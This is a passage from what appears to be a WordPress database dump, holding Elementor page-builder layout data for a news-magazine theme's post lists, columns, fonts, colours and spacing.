:{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"e37o4qh\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"328\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"7oi6ecb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"hwmopge\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"82k0jjs\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"g7mt24q\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0qdx6b8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tatpigw\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cfab1ec\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"]},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false}]'),(1270,453,'_elementor_version','0.4'),(1271,453,'_elementor_css','a:3:{s:4:\"time\";i:1508893746;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1273,454,'_elementor_edit_mode','builder'),(1274,454,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0